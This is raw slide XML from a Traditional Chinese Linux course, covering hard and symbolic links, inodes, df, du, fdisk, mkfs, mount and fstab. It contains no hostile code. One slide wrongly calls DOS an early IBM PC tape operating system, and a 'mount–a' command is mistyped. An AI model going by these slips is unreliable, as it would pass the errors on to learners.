              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>變為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>2 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刪除檔案連結檔內容仍可使用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檔案和硬連結檔案資訊相同且同步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1482735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實體連結的檔案讀取示意圖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以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及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/root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檔案為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透過</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>inode1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2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指定的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>block </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可找到兩個不同的檔案，但不管使用哪個檔名，最後還是共同指向一個 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>real </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>去讀取到檔案實際內容。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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所將任何一個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>『</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>檔名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>』</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>刪除，其實 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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block </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>都還是存在的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77101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硬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實體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缺點特徵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能跨 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Filesystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、磁區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能 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>目錄，只能連結檔案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248635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硬連結範例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建立檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(file)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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建立硬連結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hfile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發現兩者檔案資訊皆相同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9804177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硬連結範例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刪除原始檔案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9638744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軟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符號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特徵</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>為了結克服了硬連結不足之處，故建立對檔案間接指標，類似</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>系統中的檔案捷徑。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>軟連結和原始檔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不同，代表為兩個不同檔案，所以連結會佔用掉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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block 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在檔案屬性上軟連結明確寫出了是連結檔案，且兩者都不同步。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不受磁區範圍限制。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>PS.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>若刪除檔案後軟連結就無法使用，但若再次建立相同檔案，軟連結又會重新指向這個檔案（但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號與之前的不同了）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48876412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軟連結示意圖解釋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以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及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/root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檔案為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由 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>號讀取到連結檔的內容僅有檔名，根據檔名連結到正確的目錄去取得目標檔案的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>， 最終就能夠讀取到正確的資料了。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如果目標檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(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rontab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>被刪除了，整個環節就會無法繼續進行下去， 最後會發生無法透過連結檔讀取的問題了！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2138706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兩種連結與比較範例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建立檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(file)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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建立兩種連結與觀察比較三者檔案屬性關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7435935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由於連結的方式不同，硬連結與符號連結有著以下的差異：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>當原檔刪除後，符號連結將會失效，硬連結則仍然可以繼續使用。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>硬連結只能連結同一個分割區內的檔案，而符號連結則因為只是一個指向檔案的字串，所以可以跨越不同分割區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4630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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNIX是一套</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>多人多工</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的作業系統，大多應用在工作站等級以上的電腦。在此類的電腦系統環境中，使用者只要擁有一套終端機設備，就可以透過UNIX的管理使用電腦主機的資源來完成自己的工作，並且不必擔心互相影響的問題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5124384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硬連結不能連結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因為目錄的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>inode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中，計算連結數的欄位已經有其他的用途，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所以無法讓硬連結使用，符號連結可以指向任何目錄，並可如同真的目錄一樣地使用。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>硬連結與符號連結各有其限制，所以您必須依時機與用途，選擇適合的方式使用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097495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joe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -r 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>wtmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>joe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/wtmp1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ln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log/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>wtmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>joe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/wtmp2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -s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 ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>joe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/hosts3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9729665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en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>cp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tmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ln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passwd1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -s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passwd2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>il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2397427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en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>mkdir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lke</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>touch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a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>touch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b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a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a1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -s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b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b1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>rm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a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b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cat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a1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>lke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/b1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494855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五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系統特性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51309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uperblock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記錄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ilesystem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整體資訊，包括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od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block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總量、使用量、剩餘量，以及檔案系統的格式與相關資訊等。</a:t>
            </a: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od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記錄檔案的屬性，一個檔案佔用一個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od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同時記錄此檔案的資料所在的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lock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號碼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lock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實際記錄檔案的內容，若檔案太大時，會佔用多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lock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2757049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600" dirty="0" smtClean="0"/>
              <a:t>file :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>觀察檔案的類型與型態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000" dirty="0" smtClean="0"/>
              <a:t>可用於資訊鑑識確認檔案是否有被藏檔案</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>找出 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>即 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>這兩個檔案的格式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可知道這兩個檔案分別是文字檔 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(ASCII text) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>及執行檔 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(ELF 64-bit LSB...)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="26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1176277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b="1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f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disk fre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顯示掛載檔案系統使用的硬碟容量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語法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en-US" altLang="zh-TW" sz="1400" b="1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f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-h]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 -h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以人類可閱讀的格式，顯示容量大小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197803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u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directory usag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顯示現行目錄或指定目錄下所有檔案大小以及總磁碟空間用量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語法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u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[-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h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名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 -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摘要顯示該目錄容量大小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 -h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以人類可閱讀的格式，顯示所有檔案及目錄容量大小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659313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TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>磁碟分割、格式化、檢驗與掛載</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" kern="12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en-US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磁碟管理非常重要，故新增硬碟時，必須完成以下步驟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</a:p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對磁碟進行分割，以建立可用的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partition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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>磁區分割建立類型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>(P:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>主要分割 → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>E:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>延伸分割→</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>L:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>邏輯分割</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p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對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partition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進行格式化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format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建立可用的檔案系統。</a:t>
            </a:r>
          </a:p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對剛建立好的檔案系統進行檢驗。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW" kern="1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53010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UNIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的特色</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>穩定性高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移植性高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多人多工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安全性佳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系統架構良好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49880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TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>磁碟分割、格式化、檢驗與掛載</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" kern="12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建立掛載點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並</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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完成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掛載。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" kern="12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zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>建立掛載點</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r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mnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>目錄下建立使用磁區</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t> →再使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>mount–a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>掛載</a:t>
            </a:r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etc</a:t>
            </a:r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fstab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>所設定 需要掛載的掛載點</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>如下頁圖示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:latin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1257143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TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>磁碟分割、格式化、檢驗與掛載</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p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etc</a:t>
            </a:r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fstab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>內容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
              <a:latin typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>系統進行開機時必須</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>掛載的掛載點。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/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6720936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="1" dirty="0" smtClean="0"/>
              <a:t>列出系統上的所有磁碟列表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" smtClean="0"/>
              <a:t>諧音</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>:ls block</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p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91782141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="1" dirty="0" err="1" smtClean="0"/>
              <a:t>lsblk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>列出系統上的所有磁碟列表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>新增硬碟到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>VM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>後，用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>lsblk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>看磁碟列表查看發現新增</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>sdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>設備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832579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以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disk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dev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hdc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對硬碟</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="zh-TW" sz="1400" kern="120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行分割</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="1400" kern="120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例</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="zh-TW" sz="1400" kern="120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切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artitio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6262542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入後，輸入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出現選單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刪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artitio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新增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artitio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q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不儲存設定，離開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disk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w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寫入分割表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我們只要在最後不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w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而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q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則此選單中作任何動作都不會生效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795459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出目前磁碟的狀態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3468830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f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磁碟格式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fs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t ext3 /dev/hdc6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25629814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e2fs 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–b block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大小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多少容量給多一個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2253825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磁碟掛戴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mount –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7277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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOS是早期IBM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PC的磁帶作業系統</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Disk Operation System) ，</a:t>
            </a:r>
            <a:r>
